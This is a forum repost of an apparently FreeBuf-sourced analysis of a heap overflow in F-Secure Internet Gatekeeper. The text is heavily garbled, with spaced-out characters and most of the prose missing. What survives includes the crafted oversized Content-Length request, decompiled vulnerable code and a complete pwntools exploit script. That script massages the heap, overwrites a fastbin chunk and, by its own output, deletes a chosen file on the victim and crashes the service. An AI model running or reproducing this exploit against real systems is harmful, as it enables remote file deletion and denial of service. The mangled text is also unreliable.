搜索

[15075] 2020-02-29_F-SecureInternetGatekeeper中的堆溢出漏洞分析

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2020-02-29_F-SecureInternetGatekeeper中的堆溢出漏洞分析 F - S e c u r e   I n t e r n e t   G a t e k e e p e r A l p h a _ h 4 c k   F r e e B u f   2 0 2 0 - 0 2 - 2 9 F - S e c u r e   I n t e r n e t   G a t e k e e p e r F - S e c u r e   I n t e r n e t   G a t e k e e p e r C e n t O S 1 4 G B R A M F - S e c u r e   I n t e r n e t   G a t e k e e p e r h t t p s : / / w w w . f - s e c u r e . c o m / e n / b u s i n e s s / d o w n l o a d s / i n t e r n e t - g a t e k e e p e r   S H A 2 5 6
1 5 8 2 a a 7 7 8 2 f 7 8 f c f 0 1 f c c f e 0 b 5 9 f 0 a 2 6 b 4 a 9 7 2 0 2 0 f 9 d a 8 6 0 c 1 9 c 1 0 7 6 a 7 9 c 8 e 2 6 1 使 x 6 4 C e n t O S y u m   i n s t a l l   g l i b c . i 6 8 6 2 F - S e c u r e   I n t e r n e t   G a t e k e e p e r r p m   - I . r p m 3 便 g d b   8 + g e f h t t p s : / / g i t h u b . c o m / h u g s y / g e f 使 G H I D R A / I D A / F - S e c u r e   I n t e r n e t   G a t e k e e p e r F - S e c u r e F - S e c u r e   I n t e r n e t   G a t e k e e p e r F - S e c u r e   I n t e r n e t   G a t e k e e p e r 9 0 1 2 / t c p H T T P I M A P H T T P 访 C f s i k g w e b u i W e b C / C + + 使 C i v e t W e b 使 C i v e t W e b C / C + + 使 F u z z o t r o n F u z z o t r o n 使 R a d a m s a T C P 便 P O S T R a d a m s a C o n t e n t - L e n g t h   H e a d e r H e a d e r C o n t e n t - L e n g t h :   2 1 4 8 7 4 8 3 8 4 4 g d b f s _ h t t p d _ c i v e t w e b _ c a l l b a c k _ b e g i n _ r e q u e s t H T T P C o o k i e 使 9 0 1 2 P O S T C o n t e n t - L e n g t h   H e a d e r f s _ h t t p d _ g e t _ h e a d e r C o n t e n t - L e n g t h s t r t o u l P O S T   / s u b m i t   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 0 . 2 4 : 9 0 1 2 C o n t e n t - L e n g t h :   2 1 4 8 7 4 8 3 8 4 4 A A A A A A A A A A A A A A A A A A A A A A A A A A A
s t r t o u l 3 2 2 ^ 3 2 - 1 C o n t e n t - L e n g t h s t r t o u l U L O N G _ M A X 3 2 0 x F F F F F F F F f s _ h t t p d _ c i v e t w e b _ c a l l b a c k _ b e g i n _ r e q u e s t m a l l o c C o n t e n t _ L e n g t h 1 m a l l o c 0 x F F F F F F F F   +   1 0 x 0 0 0 0 0 0 0 0 m a l l o c 0 m a l l o c ( 0 ) c h u n k 0 x 1 0 m g _ r e a d 便 H T T P P o C c o n t e n t _ l e n   =   f s _ h t t p d _ g e t _ h e a d e r ( h e a d e r _ s t r u c t ,   " C o n t e n t - L e n g t h " ) ; i f   (   c o n t e n t _ l e n   ) {       c o n t e n t _ l e n _ n e w   =   s t r t o u l ( c o n t e n t _ l e n _ o l d ,   0 ,   1 0 ) ; } / /   f s _ m a l l o c   = =   m a l l o c d a t a _ b y _ p o s t _ o n _ h e a p   =   f s _ m a l l o c ( c o n t e n t _ l e n _ n e w   +   1 ) / /   c o n t e n t _ l e n _ n e w   i s   w i t h o u t   t h e   a d d i t i o n   o f   0 x 1 . / /   s o   c o n t e n t _ l e n _ n e w   = =   0 x F F F F F F F F i f ( c o n t e n t _ l e n _ n e w ) {         i n t   b y t e s _ r e a d   =   m g _ r e a d ( h e a d e r _ s t r u c t ,   d a t a _ b y _ p o s t _ o n _ h e a p ,   c o n t e n t _ l e n _ n e w ) } f r o m   p w n   i m p o r t   * i m p o r t   t i m e i m p o r t   s y s d e f   s e n d _ p a y l o a d ( p a y l o a d ,   c o n t e n t _ l e n = 2 1 4 8 7 4 8 3 8 4 4 ,   n o f u n = F a l s e ) :         r   =   r e m o t e ( s y s . a r g v [ 1 ] ,   9 0 1 2 )         r . s e n d ( " P O S T   /   H T T P / 1 . 1 n " )         r . s e n d ( " H o s t :   1 9 2 . 1 6 8 . 0 . 1 2 2 : 9 0 1 2 n " )         r . s e n d ( " C o n t e n t - L e n g t h :   { } n " . f o r m a t ( c o n t e n t _ l e n ) )         r . s e n d ( " n " )         r . s e n d ( p a y l o a d )         i f   n o t   n o f u n :                 r . s e n d ( " n n " )         r e t u r n   r
F - S e c u r e F S C - 2 0 1 9 - 3 F - S e c u r e F - S e c u r e   I n t e r n e t   G a t e k e e p e r v 5 . 4 0 5 . 5 0   h o t f i x   8   ( 2 0 1 9 - 0 7 - 1 1 ) L i n u x 1 L i n u x   H e a p   E x p l o i t a t i o n   I n t r o   S e r i e s :   S e t   y o u   f r e e ( )     p a r t   1 2 L i n u x   H e a p   E x p l o i t a t i o n   I n t r o   S e r i e s :   S e t   y o u   f r e e ( )     p a r t   2 G L i b C 1 G L i b C   M a l l o c   f o r   E x p l o i t e r s     Y o u T u b e d e f   t r i g g e r _ e x p l o i t ( ) :         p r i n t   " T r i g g e r i n g   e x p l o i t "         p a y l o a d   =   " "         p a y l o a d   + =   " A "   *   1 2                           #   P a d d i n g         p a y l o a d   + =   p 3 2 ( 0 x 1 d )                         #   F a s t   b i n   c h u n k   o v e r w r i t e         p a y l o a d   + =   " A " *   4 8 8                           #   P a d d i n g         p a y l o a d   + =   p 3 2 ( 0 x d d a 0 0 7 7 1 )             #   A d d r e s s   o f   p a y l o a d         p a y l o a d   + =   p 3 2 ( 0 x d d a 0 0 7 7 1 + 4 )         #   J u n k         r   =   s e n d _ p a y l o a d ( p a y l o a d ) d e f   m a s s a g e _ h e a p ( f i l e n a m e ) :                 p r i n t   " T r y i n g   t o   m a s s a g e   t h e   h e a p . . . . . "                 f o r   x   i n   x r a n g e ( 1 0 0 ) :                         p a y l o a d   =   " "                         p a y l o a d   + =   p 3 2 ( 0 x 0 )                           #   N e e d e d   t o   b y p a s s   c h e c k s                         p a y l o a d   + =   p 3 2 ( 0 x 0 )                           #   N e e d e d   t o   b y p a s s   c h e c k s                         p a y l o a d   + =   p 3 2 ( 0 x d d a 0 0 7 7 d )             #   P o i n t s   t o   w h e r e   t h e   f i l e n a m e   w i l l   b e   i n   m e m o r y                         p a y l o a d   + =   f i l e n a m e   +   " x 0 0 "                         p a y l o a d   + =   " C " * ( 0 x 3 0 0 - l e n ( p a y l o a d ) )                         r   =   s e n d _ p a y l o a d ( p a y l o a d ,   c o n t e n t _ l e n = 0 x 8 0 0 0 0 ,   n o f u n = T r u e )                         r . c l o s e ( )                         c u t _ c o n n   =   T r u e                 p r i n t   " H e a p   m a s s a g e   d o n e " i f   _ _ n a m e _ _   = =   " _ _ m a i n _ _ " :         i f   l e n ( s y s . a r g v )   ! =   3 :                 p r i n t   " U s a g e :   . / { }   < v i c t i m _ i p >   < f i l e _ t o _ r e m o v e > " . f o r m a t ( s y s . a r g v [ 0 ] )                 p r i n t   " R u n   ` e x p o r t   P W N L I B _ S I L E N T = 1 `   f o r   d i s a b l i n g   v e r b o s e   c o n n e c t i o n s "                 e x i t ( )         m a s s a g e _ h e a p ( s y s . a r g v [ 2 ] )         t i m e . s l e e p ( 1 )         t r i g g e r _ e x p l o i t ( )         p r i n t   " E x p l o i t   f i n i s h e d .   { }   i s   n o w   r e m o v e d   a n d   r e m o t e   p r o c e s s   s h o u l d   b e   c r a s h e d " . f o r m a t ( s y s . a r g v [ 2 ] )
2 U n d e r s t a n d i n g   t h e   G L i b C   I m p l e m e n t a t i o n     P a r t   1 3 U n d e r s t a n d i n g   t h e   G L i b C   I m p l e m e n t a t i o n     P a r t   2 1 G E F h t t p s : / / g i t h u b . c o m / h u g s y / g e f 2 V i l l o c h t t p s : / / g i t h u b . c o m / w a p i f l a p i / v i l l o c * d o y e n s e c F B A l p h a _ h 4 c k F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理